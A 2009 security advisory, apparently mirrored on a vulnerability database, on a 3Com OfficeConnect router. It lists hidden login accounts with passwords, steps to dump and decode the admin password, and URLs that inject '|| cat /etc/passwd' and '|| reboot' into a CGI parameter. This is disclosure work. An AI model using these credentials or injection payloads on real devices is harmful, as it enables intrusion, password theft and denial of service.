Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22655
HistoryOct 19, 2009 - 12:00 a.m.

3Com OfficeConnect Firewall/Router multiple remote Vulnerabilities

2009-10-1900:00:00
vulners.com
71
JSON

Product: 3Com OfficeConnect Firewall/Router
Website: http://www.3com.com/
Discovered By: Andrea Fabrizi
Email: [email protected]
Web: http://www.andreafabrizi.it
Vuln: remote command execution and password disclosure

####### Admin password disclosure #######

1) SSH/Telnet to router using one of these hidden accounts:
support:support
user:5
nobody:admin
2) Type 9
3) Type 1
3) Type 3 to dump the configuration
4) Locate the sysPassword field:
<sysPassword value="cXdlcnR5Cg=="/>
5) Decode the admin password:
roland@hp6720s:~$ echo -ne "cXdlcnR5Cg==" | base64 -d
qwerty

####### Remote command execution #######

http://1.2.3.4/utility.cgi?testType=1&amp;IP=aaa || cat /etc/passwd

To see the command output you need to log into the router, however the
command is executed even the user is not logged in, so if you don't
have access to the device a DOS is also possible:

http://1.2.3.4/utility.cgi?testType=1&amp;IP=aaa || reboot

JSON